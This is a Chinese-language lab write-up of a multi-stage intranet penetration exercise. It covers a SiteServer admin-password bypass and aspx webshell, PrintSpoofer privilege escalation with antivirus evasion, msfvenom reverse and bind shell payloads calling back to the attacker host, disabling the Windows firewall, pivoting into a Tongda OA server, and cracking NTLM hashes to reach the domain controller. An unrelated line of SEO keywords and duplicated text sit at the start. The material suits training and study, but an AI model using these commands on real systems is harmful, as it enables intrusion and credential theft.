龙岩网站建设,画册设计说明,平江外贸网站推广找哪家,微信小游戏开发者平台首先环境配置
VMware的网络配置图 环境拓扑图 开始渗透
信息收集
使用kali扫描一下靶机的IP地址 靶机IP#xff1a;192.168.0.114 攻击机IP#xff1a;192.168.0.109 获取到了ip地址之后#xff0c;我们扫描一下靶机开放的端口 靶机开放了21,80,999,3389,5985,6588端口…首先环境配置
VMware的网络配置图 环境拓扑图 开始渗透
信息收集
使用kali扫描一下靶机的IP地址 靶机IP192.168.0.114 攻击机IP192.168.0.109 获取到了ip地址之后我们扫描一下靶机开放的端口 靶机开放了21,80,999,3389,5985,6588端口 使用masscan扫描的时候rate不要改那么大不然可能会被拦截导致扫描出来的结果不完全 根据开放的端口使用nmap进行进一步的扫描 好像有很多个httpd服务我们从80开始试 直接访问是行不通的我们需要编辑hosts给他解析一个域名 这个域名是题目给的www.moonlab.com 我们修改一下hosts文件后再去访问
渗透开始
Web服务器
修改好之后我们访问一下 访问后发现是一片空白根据习惯对于web页面我们可以访问一下robots.txt文件 有三个目录我们首先访问第一个/SiteServer/ 是一个siteserver的登录界面并且版本号为3.6.4我们查一下有关这个框架的漏洞 找到了一个能跳过回答问题直接获得管理员密码的漏洞 https://cn-sec.com/archives/71636.html 说直接禁用js即可获得管理员密码 这里答案选择空然后使用插件把js禁用点下一步即可获得admin的密码 我们使用这个密码去登录一下 成功登录到后台我们看看有没有什么地方可以上传shell的 ps:这里跟WordPress上传shell一样我发现的有两个地方可以上传 1.可以把shell打包成一个主题文件zip上传之后解压就可以获得shell 2.找到可以直接修改文件的地方把代码修改成我们的恶意代码也可以实现 我这里使用的第二种方法 我们找一下哪个地方可以修改文件 有一个T_xxx.aspx的文件是首页的默认模板意思就是我们直接修改T_xxx.aspx这个文件再访问www.moonlab.com就可以直接访问到我们的shell了 这里我是用的冰蝎自带的aspx的木马因为普通的一句话会被安全狗拦截下来 保存之后我们直接用冰蝎尝试连接一下 如果用其他的工具没有通过处理的很有可能会被防火墙把流量拦截下来 成功连接我们看一下当前的权限 是普通用户的权限我们尝试一下提权首先看一下服务器运行了些什么程序开了什么服务 net start 开了安全狗、Defender、firewall、mysql和Print Spooler等服务 再看一下服务器系统版本 这样我们可以根据开放的服务和系统版本查找一下可能的提权工具 我们可以利用print spooler服务进行提权 去github上查找一下exp https://github.com/whojeff/PrintSpoofer 把exp下载下来之后直接上传是不行的因为有安全狗会把我们上传的恶意程序直接杀掉 我们需要自己做一下免杀 免杀可以参考这一篇文章 https://www.freebuf.com/articles/web/261444.html 做了免杀之后我们把exp上传到c:/windows/temp目录下因为这个目录跟linux的/tmp差不多我们可以有足够的权限来上传和执行文件 成功上传我们尝试使用一下这个程序进行提权 提权成功获得到了system权限我们把权限上线到msf 先在msf监听9999端口 然后冰蝎直接反弹shell回来
SYSTEM权限上线CS
我们首先要反弹一个system权限到msf然后再派生到cs上 我们先使用msf创建一个反弹程序然后看看能不能上传成功做一下免杀 msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.0.109 LPORT2333 -e x86/shikata_ga_nai -i 20 -f c -o payload3.c 生成成功后用工具做一下免杀然后上传测试 成功上传了然后我们使用dayu.exe提权运行一下 终于反弹成功我们把权限派生到cs吧 use exploit/windows/local/payload_inject set lhost 192.168.0.109 #此处跟cs监听器一样 set lport 6060 #此处跟cs监听器一样 set session 6 #跟自己获得的session的id一致 run 成功上线到cs 我们查看一下他的网卡进行进一步渗透 发现还有一张10.10.1.0/24网段的网卡我们添加一下路由 使用arp扫描一下这个网段下还有什么别的主机 扫描出来还有一个10.10.1.130的主机我们使用msf创建一个通往10.10.1.0/24的代理 修改一下/etc/proxychains4.conf文件 然后使用命令测试一下连通性 proxychains4 curl 10.10.1.130 成功返回了我们扫描一下主机开放的端口 proxychains4 nmap -Pn -sT -sV 10.10.1.130 发现只对外开放了80端口我们用网站访问一下 proxychains4 firefox 10.10.1.130 发现是一个通达OA的系统并且是2020年的这个系统是存在漏洞的
OA系统
我们去百度查询一下这个系统的漏洞 找到一个工具 成功上传我们用蚁剑尝试一下连接 注意windows需要使用代理才可以连上10网段 成功连上但是蚁剑并不能执行命令 我们上传一个冰蝎的马然后用冰蝎连接吧 连接 连接成功并且是system权限很不错我们查看一下IP地址 发现有两张网卡另外一张是10.10.10.0/24网段的这应该就是域控在的网段了现在我们尝试拿下域控
拿下域控
搭建代理
先弄一个能到达域控网段的代理 开放了445端口如果可以利用的话我们就不用搞二层代理了方便一点但是我们之前扫描的时候只能扫描到80端口猜测是防火墙拦截了我们用命令把防火墙关闭一下 NetSh Advfirewall set allprofiles state off 关闭成功我们重新扫描一下445端口 成功开放了 我们使用msf生成一个攻击载荷然后继续用工具进行一下免杀 msfvenom -p windows/meterpreter/bind_tcp LPORT6666 -e x86/shikata_ga_nai -i 15 -f csharp -o payload_bind.txt 上传试试 看起来好像没被杀掉我们尝试连接一下 先在msf开启监听 use exploit/multi/handler set payload windows/meterpreter/bind_tcp set rhost 10.10.1.130 set lport 6666 run 成功连接
开始渗透
看看现在处于哪个域下面 域名是dc.attack.local 现在就是需要做域内信息收集了可以用cs的beacon也可以直接使用msf的模块我这里直接使用的msf的模块 meterpreter run post/windows/gather/enum_domain 查询到域控的ip地址 我们再看看域有哪些用户登录着域控有什么用户 发现本机的进程有域管理员我们添加一下通往10.10.10.0/24的路由探测一下域控端口开放信息 然后使用命令 proxychains4 nmap -sT -Pn 10.10.10.165 -p 80,89,8000,9090,1433,1521,3306,5432,445,135,443,873,5984,88,6379,7001,7002,9200,9300,11211,27017,27018,50000,50070,50030,21,22,23,2601,3389 --open 探测一下服务器开放的端口 开了445和3389端口 我们首先要登录域控我们获取一下用户的PID和SID的NTML
小插曲
我们需要登录web服务器先把他的防护软件全部关掉然后再去获取ntml
拿到之后我们就可以尝试登录域控管理员了
破解HTLM
我们使用在线网站解密一下ntlm看看能不能获得密码 成功获取到密码我们用windows远程登录一下 出现这个我们需要修改一下远程桌面的设置 可以参考这篇文章https://blog.csdn.net/qq_32682301/article/details/116003700 修改好之后我们就可以登录了 成功获取到flag
总结
这一次的内网渗透让我学到了很多新的东西中间也遇到了很多的困难不会的地方不过好在网上有很多大佬已经做过writeup了让我这个菜鸡不至于卡死 现在把整个流程都写下来吧 siteserver的找回密码漏洞SQL注入漏洞虽然没用上通过siteserver上传一个webshell获得普通权限 然后看一下系统版本信息为2016再看看服务器开了什么服务开了什么端口有什么可能存在漏洞的点然后根据这些东西去查询2016有什么漏洞可以利用 然后发现了有一个Print Spooler的提权漏洞但是直接上传poc是不行的因为有安全狗Windows Defender的防护直接上传就会导致立马被杀所以我们需要做一下免杀处理 参考这篇文章https://www.freebuf.com/articles/web/261444.html 然后把shell反弹到msf或者上线cs都是可以的上传一个msf生成的攻击模块也是需要进行免杀以下省略 探测一下内网内别的网段进行进一步的渗透 发现是一个通达OA的系统刚好我知道这个漏洞然后就是通达OA系统的渗透提权 再通过正向代理连接到msf上然后继续渗透看看别的网段找到之后看看域的名称域控的IP有什么用户登录了并且有什么可能可以利用的点进行利用 一步一步进行权限的提升 学了很多东西尤其是有关域内渗透还有免杀方面上传的时候卡了我好久QAQ的东西让我学到了新的知识新的工具
可能有人说最后直接用密码登录的没啥含金量其实我也试过别的方法pth登录还有msf的psexec模块等但都没有成功QAQ 好啦就这样吧 学而时习之不亦说乎
